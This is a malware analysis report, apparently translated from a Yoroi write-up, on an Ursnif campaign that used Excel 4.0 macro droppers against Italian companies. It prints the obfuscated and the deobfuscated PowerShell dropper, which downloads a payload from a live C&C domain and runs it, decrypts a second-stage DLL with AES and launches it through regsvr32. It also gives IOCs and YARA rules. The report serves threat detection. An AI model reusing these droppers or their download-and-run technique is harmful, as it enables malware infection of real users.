
New Ursnif Attack Targeting Italian Companies

 4 years ago
source link: https://www.freebuf.com/articles/others-articles/234275.html

Introduction

Ursnif is one of the most active threats around and commonly runs spam campaigns against many industries in Italy and across Europe.

Recently, a new Ursnif variant targeting Italian companies was discovered. The spam emails carry an attachment named Avviso di Pagamento_xxxx_date (where xxxx is a number and date is a date in dd-mm-yyyy format), for example Avviso di Pagamento_14326_15_04_2020. In this campaign the techniques used by the Ursnif/ISFB dropper have changed significantly: it adopts new techniques to evade detection, and the Ursnif infection chain has been substantially reworked.

Technical Analysis

Compared with other samples of the Ursnif malware family, the sample used against Italian companies contains several important upgrades, and the attack chain has changed noticeably. First, the dropper uses Excel 4.0 macros (XLM macros) to lower the detection rate of antivirus engines; it then uses two different C&C servers, one of which is used only to record the UUID of the compromised host.

The figure below shows the complete infection chain of this Ursnif campaign:

[Figure: complete infection chain of the campaign]

The Old Macro Code

This new Ursnif campaign starts with a malicious email attachment carrying an embedded XLM macro. The static information of the dropper is as follows:

Hash: 5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394
Threat: Ursnif XLS document dropper
Size: 39.0 KB (39936 bytes)
File type: MS Excel document
Brief description: Ursnif XLS document dropper with embedded XLM macro code
ssdeep: Deb3eTlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0LzX74bTPuQ:DeaTlYkEIbSkKBEqEXPgsRZmbaoFhZhq

When the file is opened it looks like an unfilled **. The page shows a Visualiz button that lures the victim into clicking it to trigger the infection. Once the button is clicked, the code designed to infect the target machine is launched:

[Figure: the document lure with its Visualiz button]

Structurally the file resembles past malicious samples, but its content differs considerably. The security warning shows that the document contains dynamic content, and a closer inspection reveals the presence of an embedded Excel 4.0 macro (XLM/XLF macro).

[Figure: security warning and the embedded Excel 4.0 macro]

The dynamic content is written in PowerShell, split across many cells, and then evaluated by a few predefined handlers:

[Figure: PowerShell code fragments distributed across cells]

When the user clicks Allow Content, the Frame1_Layout function fires. It reassembles the malicious macro code and makes the document pop up a window telling the user that the document is corrupted. When the user clicks it, the macro terminates the Excel process while PowerShell keeps running in the background.

Once the macro code has been reassembled, the extracted macro code turns out to be the Ursnif dropper:

```powershell
# Obfuscated dropper as extracted from the macro (base64 blob truncated in this copy).
# It aliases New-Object to "uu", builds the string "ieX" from $VerbosePreference ("SilentlyContinue"),
# base64-decodes and Deflate-decompresses the blob, and invokes the resulting script.
sal uu New-Object; &( ([stRING]$VErBoSePRefErENce)[1,3]+'X'-JoIN'') ( uu io.compRESSiON.defLaTEstrEaM([system.Io.meMoRysTrEaM] [conVerT]::FROMbASE64StriNG( 'ZVULU9pKFP4rOxmum60QSXhpGWYualooPlrB1tbL3ERZJSUmSJYqTfe/3+8syGPuDNkX5/GdN2OFeFKv3vktxm7VYiqHtpVXdN7Q+aHOPZ1Xde66+HRe13kNh7LO8TvSFit9YPwqUh1e5JePs/Zn7NdXEdY+vsHCOcHWzrCMvztE9L0/wOo/OZl/j8M5vk777PES+9ViqrhgrMnYHg...' ),[iO.ComPrESsIOn.CoMPreSSioNmodE]::DEcOmPreSS )| fOReACH-ObjECT{ uu iO.StReamrEadeR( $_ ,[teXT.EnCODing]::AsCIi ) } |FoReACh-OBjecT{$_.READTOEnD() } )
```

After deobfuscation, the code simplifies to the following:

```powershell
# Deobfuscated dropper: Ts() swaps the digit in 'new1.' for 'uploadswift' (newuploadswift[.]pw), checks the host with
# Test-Connection and builds an https:// URL under it; if it is unreachable, kN() derives a fallback host from 3-letter
# strings whose MD5 ends in a fixed suffix (Ht()). The page is fetched with a browser User-Agent and piped to iex.
$lk64bE= [type]("{3}{7}{8}{2}{4}{11}{1}{6}{5}{10}{0}{9}" -F 'RitH','OgrAP','URi','S','Ty.C','As','hY.H','YST','Em.sEc','M','HALgO','Rypt') ; &("{1}{0}"-f 'et','S') 1S7 ( [TyPe]("{3}{1}{2}{0}" -F 'eNCOdING','TeX','t.','SysTEM.') ) ; $9Sk2Z =[TyPE]("{1}{0}" -f 'egEx','r');${IK`oL`OS}=0;Function T`h([String] ${Hy},${G`h}="MD5"){${Hh}=.('uu') ("{0}{1}{4}{5}{3}{2}" -f'S','ystem.Text.Stri','er','ld','n','gBui'); $lK64BE::("{2}{1}{0}" -f 'e','reat','C').Invoke(${GH})."cOMp`UTEhA`SH"( ( .("{0}{2}{3}{1}"-f'G','E','et-v','ArIaBL') 1S7 ).VAlUE::"uT`F8".("{1}{0}{2}"-f'etByt','G','es').Invoke(${H`Y}))|.('%'){[Void]${h`H}.("{0}{1}"-f'App','end').Invoke(${_}.("{0}{1}" -f'ToSt','ring').Invoke("x2"))};${HH}.("{0}{1}" -f 'ToS','tring').Invoke()};function Ht([string] ${E`E}){do{${U}=-join((97..122)|&("{1}{0}{2}"-f 'et-Rando','G','m') -Count 3|.('%'){[char]${_}})}while((&('th')(${U})) -notlike '*'+${e`e});return ${U}};${x`D}=("{2}{1}{0}" -f 't','adswif','uplo');${h`z}='ass';${Q}=2;${di}='pw';function Ts(${IJ}){${T`iK}=${IJ};if(${t`IK} -match 2){${Xd}=${H`z};${d`i}=''};${B`I}= $9SK2Z::("{1}{0}"-f 'eplace','r').Invoke(${t`Ik},'\d',${x`D});if(&("{2}{4}{1}{0}{3}" -f 'ecti','onn','T','on','est-C') (${BI}+${D`I}) -Count 1 -quiet){${bi}=''+'ht'+'tp'+("{1}{0}"-f'/','s:/')+${bi}+${dI}+'/'+${B`i}.("{1}{2}{0}"-f'ring','Sub','st').Invoke(${q}, ${Q})}else{${b`I}=${q}};return ${B`i}};${e}=@(("{0}{1}"-f'new1','.'),'');function k`N{${LP}='2al'+(&('ht')(("{0}{1}" -f '*','6e1d')))+("{1}{0}" -f '.','ail')+(.('ht')(("{1}{0}"-f 'b','*95f')));return .('ts')(${Lp})};${X`q}=.('tS')(${E}[0]);if(${x`Q} -eq ${Q}){${X`Q}=&('Kn')};${y}=.('uu') ("{1}{0}{2}" -f'bC','Net.We','lient');${y}."He`AdeRs".("{1}{0}"-f'dd','A').Invoke(("{0}{1}{2}" -f 'Us','er-A','gent'), (("{16}{0}{24}{32}{7}{9}{31}{1}{20}{6}{22}{4}{5}{30}{8}{17}{25}{29}{21}{11}{13}{26}{15}{3}{10}{18}{28}{19}{12}{23}{27}{14}{2}"-f 'ozi','64; x64) AppleW','62','8.102 ','7.','36 (','it/5','0 (','H','Window','Saf','Ge','7','c','183','hrome/70.0.353','M','T','ari','3','ebK',' ','3','.36 Edge/','lla/','ML, ','ko) C','18.','/5','like','K','s NT 10.0; Win','5.')));${y}.("{4}{0}{3}{1}{2}"-f'own','stri','ng','load','D').Invoke(${Xq})|.( ([String]''."ReM`o`Ve")[45,12,27]-Join'')
```

The dropper is obfuscated with base64 encoding, string format substitution (the many {} sequences) and random capitalisation (mixed-case sequences). Once the macro runs, the dropper connects to the domain newuploadswift[.]pw, downloads the next-stage payload and executes it with PowerShell.


After deobfuscation, the PowerShell looks like the following:

```powershell
# Deobfuscated second stage: reads the machine UUID via WMI (Win32_ComputerSystemProduct), requests <url>2?<UUID>,
# gunzips the reply (NiLL), AES-ECB-decrypts it with the first 16 UUID characters (class Af), XOR-decodes the first
# '!'-delimited segment (kelv), base64-decodes the DLL into %TEMP% and runs it via the censored regsv*** alias "msq" (gb).
function SDfiwe(${T`T}){${T`hL}=[regex]::("{2}{0}{1}"-f 'epl','ace','r').Invoke(${tt},'\d','');return ${t`hl}};function YwE(${T`e}){${i`I}=[Convert]::("{0}{3}{2}{4}{1}" -f'F','tring','e64','romBas','S').Invoke(${t`E});return ${Ii}};&("{1}{0}"-f'l','sa') Vu new-object;${l`LA}=$(&("{0}{2}{3}{1}"-f'get-','object','wm','i') Win32_ComputerSystemProduct -computername . | &("{0}{2}{1}"-f'Select-','ject','Ob') -ExpandProperty UUID);${a`Zq}=${ENV`:tE`mP};${f`Bf}=(${d}=&("{0}{1}" -f'gc','i') ${a`zq}|&("{1}{0}{2}"-f 'd','get-ran','om'))."na`mE" -replace ".{5}$";${M`K}=(&("{1}{0}"-f 'i','Gc') -path (((${A`zQ}.("{0}{2}{1}" -f 'to','ring','st').Invoke()))) | &("{2}{3}{0}{1}"-f 'e-Obj','ect','W','her') { ${_}."pSis`cON`TAiner" }|.("{2}{1}{0}"-f 'lect','e','s') fullname |.("{1}{0}{2}"-f'ndo','Get-Ra','m') -count 1)."FulLn`A`Me"+'\'+${f`BF}+'.';function NiLL(${T`yO}){${k`j}=.('Vu') IO.MemoryStream(,${t`yO});${m`m}=(.('Vu') IO.StreamReader(&('Vu') IO.Compression.GzipStream(${k`J},[IO.Compression.CompressionMode]::"d`ECO`mPrESs"))).("{1}{2}{0}"-f 'nd','ReadT','oE').Invoke();return ${M`M}};&("{0}{1}" -f 's','al') msq regsv***;${S`U}='using System;using System.Security.Cryptography;using System.Text;public class Af{public static byte[] mol(byte[] kk, string lj){byte[] jik = new UTF8Encoding().GetBytes(lj);Aes AESImplementation = Aes.Create("AES");AESImplementation.Key = jik;AESImplementation.Mode = CipherMode.ECB;ICryptoTransform CryptoTransform = AESImplementation.CreateDecryptor();return CryptoTransform.TransformFinalBlock(kk, 0, kk.Length);}public static byte[] cer(string kk, string lj){return mol(Convert.FromBase64String(kk), lj);}public static string fte(byte[] kk, string lj){return new UTF8Encoding().GetString(mol(kk, lj));}public static string fte(string kk, string lj){return new UTF8Encoding().GetString(cer(kk, lj));}}';.("{0}{1}"-f'A','dd-Type') -TypeDefinition ${su};function osi{${M}=${x`Q}+${q}+'?'+${L`LA};.('Sv') 8 ${m};&('SV') t0L ("{2}{3}{0}{1}"-f 'ie','nt','Net','.WebCl');.('Si') Variable:B (&('Vu') (&("{0}{1}" -f 'I','tem') Variable:\t0L)."v`ALUe");.('Sv') D ("{2}{0}{1}" -f'adDa','ta','Downlo');${f`DS}=(([byte[]](&('Gv') B -Value).((&('LS') Variable:D)."Va`LUE")."IN`VOke"((&('GI') Variable:8)."vAL`Ue")));return &("{0}{1}"-f 'Ni','LL')(${F`ds})};function kelv{${Fd}=&("{1}{0}" -f 'i','os');${fd}=[Af]::("{1}{0}"-f'e','ft').Invoke(${Fd},${l`lA}.("{2}{0}{1}"-f'ubstrin','g','s').Invoke(0,16));${U}=${FD}.("{1}{2}{0}" -f 'tring','su','bs').Invoke(0,1);${e`F}=${F`D}.("{1}{0}"-f 'emove','r').Invoke(0,1);${O`O}=${e`F} -split'!';${vr}=[Text.Encoding]::"Ut`F8";foreach(${O} in ${oO}[0]){${o`UT}=@();${O`A}=${U}.("{0}{1}{2}"-f'ToCharArr','a','y').Invoke();${o}=&("{1}{0}" -f 'wE','Y')(${O});for(${I}=0; ${i} -lt ${O}."c`oUnT"; ${I}++){${o`Ut} += [char]([Byte]${O}[${i}] -bxor[Byte]${OA}[${I}%${o`A}."COU`NT"])}};${SS}=${e`F}."rep`lA`ce"((${o`O}[0]+"!"),${v`R}."gE`TSTr`i`NG"(${O`UT}));return ${SS}};function gb{${k`I}=&("{1}{0}"-f'lv','ke');[io.file]::("{0}{2}{1}"-f'Write','tes','AllBy').Invoke(${m`K},(.("{1}{0}" -f 'E','Yw')(${ki} -replace ".{200}$")));if((&("{1}{0}"-f 'ci','g') ${mk})."Len`GtH" -lt 512){exit};&("{0}{1}"-f'ms','q') -s ${mK};.("{0}{1}" -f'sle','ep') 15;.('sl');[io.file]::("{2}{1}{0}" -f'ines','llL','WriteA').Invoke(${m`k},(&("{1}{0}"-f'Dfiwe','S')(${l`LA})))};&('gb')
```

Here the malware uses a special trick to guarantee a single infection per machine. The code above shows how the machine's UUID is obtained; that value is passed as the parameter of a GET request. If a GET request is sent a second time with the same UUID, the server returns an empty response; if the UUID is being sent to the server for the first time, the server returns the next stage of the infection.

[Figure: encrypted response returned by the C&C server]

As shown above, the response body is encrypted. It is decrypted by the AES decryption code shown in the script above and then executed through the regsvr32.exe process.
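The same decoding steps the script performs on the C&C reply (gunzip, AES-128-ECB keyed with the first 16 UUID characters, single-byte XOR of the first '!'-delimited segment, removal of 200 trailing characters, base64) can be replayed offline to pull the DLL out of a response captured in traffic. The PowerShell function below is an added example, not code from the report or from the malware; the function and parameter names and the output path are assumptions.

```powershell
# Added analyst helper (not from the original report): replays the second stage's
# decoding pipeline on a response body captured from traffic, so the DLL can be
# extracted for analysis without executing the sample. Parameter names are assumed.
function ConvertFrom-UrsnifResponse {
    param(
        [Parameter(Mandatory)][byte[]]$ResponseBytes,   # raw HTTP body (gzip)
        [Parameter(Mandatory)][string]$Uuid,            # Win32_ComputerSystemProduct UUID sent in the query string
        [Parameter(Mandatory)][string]$OutFile          # where to write the recovered DLL
    )
    # 1. gunzip -> base64 text (function NiLL in the script)
    $ms  = New-Object IO.MemoryStream(,$ResponseBytes)
    $gz  = New-Object IO.Compression.GzipStream($ms, [IO.Compression.CompressionMode]::Decompress)
    $b64 = (New-Object IO.StreamReader($gz)).ReadToEnd()

    # 2. AES-128-ECB with PKCS7 padding, key = first 16 UUID characters as UTF-8 (class Af, method fte)
    $aes      = [Security.Cryptography.Aes]::Create()
    $aes.Mode = [Security.Cryptography.CipherMode]::ECB
    $aes.Key  = [Text.Encoding]::UTF8.GetBytes($Uuid.Substring(0, 16))
    $ct = [Convert]::FromBase64String($b64)
    $pt = [Text.Encoding]::UTF8.GetString($aes.CreateDecryptor().TransformFinalBlock($ct, 0, $ct.Length))

    # 3. the first character is a one-byte XOR key; the base64 segment before the first '!'
    #    is decoded, XORed with that key and substituted back into the text (function kelv)
    $xorKey  = [byte][char]$pt[0]
    $rest    = $pt.Substring(1)
    $seg0    = ($rest -split '!')[0]
    $decoded = [Text.Encoding]::UTF8.GetString(
        [byte[]]([Convert]::FromBase64String($seg0) | ForEach-Object { $_ -bxor $xorKey }))
    $joined  = $rest.Replace($seg0 + '!', $decoded)

    # 4. drop the 200 trailing junk characters and base64-decode the DLL (function gb);
    #    the script itself gives up when fewer than 512 bytes come back, i.e. an empty stage
    $dll = [Convert]::FromBase64String($joined -replace '.{200}$')
    if ($dll.Length -lt 512) { throw "Only $($dll.Length) bytes decoded: empty stage (UUID already seen?)" }
    [IO.File]::WriteAllBytes($OutFile, $dll)
    return $dll.Length
}

# Usage on a body exported from a capture (paths are placeholders):
# ConvertFrom-UrsnifResponse -ResponseBytes ([IO.File]::ReadAllBytes('response.bin')) -Uuid $uuid -OutFile 'stage2.dll'
```

Feed it the body of the first successful GET carrying the UUID; a repeat request with the same UUID yields the empty response described above, which the 512-byte check reports instead of writing a file.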

Loader

The payload is as follows:

Hash: e32c592819d825851bae84a33bf5fa1a26e0a57a14c0e4b8c3e845c1117998a0
Threat: Ursnif Loader
Size: 289.50 KB (296448 bytes)
File type: DLL
Brief description: Ursnif loader capable of injecting into memory
ssdeep: 6144:ydLG0cc+HXn8zAzaFVqG9aldc3w0QBA8Ys36cMsu+a:y5GjsEzaKG4XcLs3isu+a
imphash: f11ff0b8c499af0d98f00299b97339cf

This component is the loader of the Ursnif payload. As its persistence mechanism it writes to the registry key HKCU\Software\AppDataLow\Software\Microsoft\Microsoft\[RANDOMID].

[Figure: persistence registry key written by the loader]

As in classic Ursnif infections, the sample sends its configuration string to the C&C server base64-encoded and encrypted with the Serpent algorithm. There are two ways to retrieve the configuration string:

1. Decrypt the request sent to the C&C server using the key found in process memory.

2. Search for the configuration string directly in the process's memory.

The configuration used in this Ursnif campaign is as follows:

k=kjrisau&soft=1&version=214131&user=92bdf642cd2b24f71ccbae351ccb9aa9&server=12&id=4444&crc=ef267149&uptime=12089&ip=*.*.*.*

Conclusion

Continuous tracking and analysis shows that Ursnif's TTPs change over time, and that the malware's detection-evasion and anti-analysis techniques are evolving rapidly.

This attack on Italian companies keeps the core features and functionality unchanged while using XLM macros to lower antivirus detection rates and employing two different C&C servers. One of them only receives UUIDs to track compromised hosts, a mechanism that gives the operators better visibility into the malware's infections.

IOC

5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394
e32c592819d825851bae84a33bf5fa1a26e0a57a14c0e4b8c3e845c1117998a0
newuploadswift[.]pw
yefgweoiuhf[.]xyz
HKCU\Software\AppDataLow\Software\Microsoft\Microsoft\[RANDOMID]

Yara

```yara
import "pe"

rule loaderXLS_Ursnif_Italy_April_2020 {
    meta:
        description = "Yara rule for Ursnif XLS loader - April Italian Campaign"
        hash = "5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394"
        author = "Cybaze - Yoroi  ZLab"
        last_updated = "2020-04-16"
        tlp = "white"
        category = "informational"
    strings:
        $s1 = "powershellB"
        // $s2..$s5: pieces of the cell text "saps PowerShell -arg 'sal uu New-Object; ..." with ( ) [ + written as {(} {)} {[} {+}
        $s2 = {73 61 70 73 20 50 6F 77 65 72 53 68 65 6C 6C 20 2D 61 72 67 20 27 73 61 6C 20 75 75 20 4E 65 77 2D 4F 62 6A 65 63 74 3B 20 26 7B 28 7D 20 7B 28 7D 7B 5B 7D 73 74 52 49 4E 47 7B 5D 7D 24 56 45 72 42 6F 53 65 50 52 65 66 45 72 45 4E 63 65 7B 29 7D 7B 5B 7D 31 2C 33 7B 5D 7D 7B 2B 7D 27 27 58 27 27 2D 4A 6F 49 4E 27 27 27 27 7B 29 7D 20 7B 28 7D 20 75 75 20 69 6F 2E 63 6F 6D 70 52 45 53 53 69 4F 4E 2E 64 65 66 4C 61 54 45 73 74 72 45 61 4D 7B 28 7D 7B 5B 7D 73 79 73 74 65 6D 2E 49 6F 2E 6D 65 4D 6F 52 79 73 54 72 45 61 4D 7B 5D 7D 20 7B 5B 7D 63 6F 6E 56 65 72 54 7B 5D 7D 3A 3A 46 52 4F 4D 62 41 53 45 36 34 53 74 72 69 4E 47 7B 28 7D 20 27 27 5A 56 55 4C 55 39 70 4B 46 50 34 72 4F 78 6D 75 6D 36 30 51 53 58 68 70 47 57 59 75 61 6C 6F 6F 50 6C 72 42 31 74 62}
        $s3 = {FF 09 01 17 FC 00 4C 33 45 52 5A 4A 53 55 6D 53 4A 59 71 54 66 65 2F 33 7B 2B 7D 38 73 79 47 50 75 44 4E 6B 58 35 2F 47 64 4E 32 4F 46 65 46 4B 76 33 76 6B 74 78 6D 37 56 59 69 71 48 74 70 56 58 64 4E 37 51 7B 2B 7D 61 48 4F 50 5A 31 58 64 65 36 36 7B 2B 7D 48 52 65 31 33 6B 4E 68 37 4C 4F 38 54 76 53 46 69 74 39 59 50 77 71 55 68 31 65 35 4A 65 50 73 2F 5A 6E 37 4E 64 58 45 64 59 7B 2B 7D 76 73 48 43 4F 63 48 57 7A 72 43 4D 76 7A 74 45 39 4C 30 2F 77 4F 6F 2F 4F 5A 6C 2F 6A 38 4D 35 76 6B 37 37 37 50 45 53 7B 2B 7D 39 56 69 71 72 68 67 72 4D 6E 59 48 67 43 34 70 4D 4D 71 50 54 41 75 6C 5A 45 6E 6D 4E 74 76 4D 42 73 59 42 34 76 50 62 78 68 64 41 37 43 38 51 69 49 76 54 69 35 48 33 59 75 50 70 46 76 65 59 46 55 4F 73 53 36 79 67 58 2F 75 51 49 43 41 38 4D 4A}
        $s4 = {2B 7D 4C 39 59 43 32 53 34 67 2F 58 69 70 6A 52 39 4F 69 2F 67 6D 48 47 52 62 4F 51 64 33 74 42 65 68 5A 63 39 6E 57 72 33 50 77 77 54 7B 2B 7D 35 56 6C 43 5A 73 45 49 7A 74 32 37 36 61 52 63 6E 6A 6B 42 58 79 7A 6B 49 58 43 2F 6E 48 59 4B 78 62 31 76 6C 70 7A 52 49 35 33 6E 42 78 62 44 36 66 51 79 48 45 6C 77 33 49 71 6E 46 63 68 64 43 53 4B 75 4F 65 52 61 62 6B 6B 7A 4F 51 72 38 6F 68 69 58 69 52 4D 79 7A 78 43 45 75 43 37 2F 46 34 48 67 45 4A 51 33 68 36 39 65 71 78 2F 2F 34 39 78 48 6C 36 42 7A 43 68 6C 53 45 35 36 49 51 4C 70 35 76 38 53 69 66 53 42 71 4B 4F 46 6F 35 31 66 33 6B 7B 2B 7D 44 61 34 48 2F 72 67 64 39 44 73 57 50 47 63 7A 5A 34 6E 49 30 30 76 6E 77 62 7B 2B 7D 63 76 4F 57 54 63 6C 58 36 52 64 47 61 64 63 50 6A 4D 77 6F 45 75 5A 73 4A }
        $s5 = {54 2E 45 6E 43 4F 44 69 6E 67 7B 5D 7D 3A 3A 41 73 43 49 69 20 7B 29 7D 20 7B 7D 7D 20 7C 46 6F 52 65 41 43 68 2D 4F 42 6A 65 63 54 7B 7B 7D 24 5F 2E 52 45 41 44 54 4F 45 6E 44 7B 28 7D 7B 29 7D 20 7B 7D 7D 20 7B 29 7D 27 20 2D 57 69 6E 20 30 31 3B 63 6C 65 61 72 3B 65 78 69 74 7E 7B 4E 55 4D 4C 4F 43 4B 7D}
        // " impossibile caricarlo." - the Italian "corrupted document" lure text
        $s6 = {20 69 6D 70 6F 73 73 69 62 69 6C 65 20 63 61 72 69 63 61 72 6C 6F 2E}
    condition:
        $s1 and (1 of ($s2,$s3,$s4,$s5)) and $s6
}

rule payload_DLL_Ursnif_March_2020 {
    meta:
        description = "Yara rule for Ursnif payload - April Italian Campaign"
        hash = "E32C592819D825851BAE84A33BF5FA1A26E0A57A14C0E4B8C3E845C1117998A0"
        author = "Cybaze - Yoroi  ZLab"
        last_updated = "2020-04-17"
        tlp = "white"
        category = "informational"
    strings:
        $b1 = "c:\\Above\\Industry\\Fear\\ring\\charge\\large\\set\\EarthAgainst.pdb" ascii wide
        // ".?AVruntime_error@std@@" (C++ RTTI type name)
        $b2 = {00 2E 3F 41 56 72 75 6E 74 69 6D 65 5F 65 72 72 6F 72 40 73 74 64 40 40}
        // "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        $b3 = {41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A}
        // "en-??" as UTF-16LE, null terminated
        $b4 = {65 00 6E 00 2D 00 ?? 00 ?? 00 00 00}
        $b5 = "A-C0F2E0B9FA8E}\\hide.me VPN\\Hide.me.exe" ascii wide
    condition:
        uint16(0) == 0x5A4D and pe.number_of_sections == 5 and pe.imphash() == "f11ff0b8c499af0d98f00299b97339cf" and any of them
}
```

*Reference source: Yoroi. Compiled by FreeBuf editor Avenger; please credit FreeBuf.COM when reprinting.

